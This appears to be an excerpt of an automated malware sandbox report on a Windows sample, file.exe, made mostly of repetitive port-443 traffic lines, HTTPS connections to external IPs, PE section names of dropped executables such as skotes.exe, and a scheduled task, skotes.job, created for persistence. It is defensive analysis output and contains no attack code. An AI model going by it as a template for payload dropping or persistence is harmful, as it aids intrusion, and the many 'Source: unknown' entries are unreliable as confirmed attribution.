Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50279
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841

Source: unknown	HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.67:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.67:443 -> 192.168.2.5:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50135 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50141 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50154 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50159 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50267 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.11.192.48:443 -> 192.168.2.5:50350 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: section name:
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.21.dr	Static PE information: section name:
Source: skotes.exe.21.dr	Static PE information: section name: .idata
Source: random[2].exe.24.dr	Static PE information: section name:
Source: random[2].exe.24.dr	Static PE information: section name: .idata
Source: 6ca8f7e5e2.exe.24.dr	Static PE information: section name:
Source: 6ca8f7e5e2.exe.24.dr	Static PE information: section name: .idata
Source: random[1].exe.24.dr	Static PE information: section name:
Source: random[1].exe.24.dr	Static PE information: section name: .rsrc
Source: random[1].exe.24.dr	Static PE information: section name: .idata
Source: random[1].exe.24.dr	Static PE information: section name:
Source: 9305c7ab92.exe.24.dr	Static PE information: section name:
Source: 9305c7ab92.exe.24.dr	Static PE information: section name: .rsrc
Source: 9305c7ab92.exe.24.dr	Static PE information: section name: .idata
Source: 9305c7ab92.exe.24.dr	Static PE information: section name:
Source: random[1].exe0.24.dr	Static PE information: section name:
Source: random[1].exe0.24.dr	Static PE information: section name: .idata
Source: 9fc857756c.exe.24.dr	Static PE information: section name:
Source: 9fc857756c.exe.24.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 24_2_00AECB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

24_2_00AECB97

Source: C:\Users\user\DocumentsDHCAECGIEB.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70AC60	0_2_6C70AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DAC30	0_2_6C7DAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C6C00	0_2_6C7C6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75ECD0	0_2_6C75ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FECC0	0_2_6C6FECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CED70	0_2_6C7CED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C88CDC0	0_2_6C88CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C888D20	0_2_6C888D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C704DB0	0_2_6C704DB0
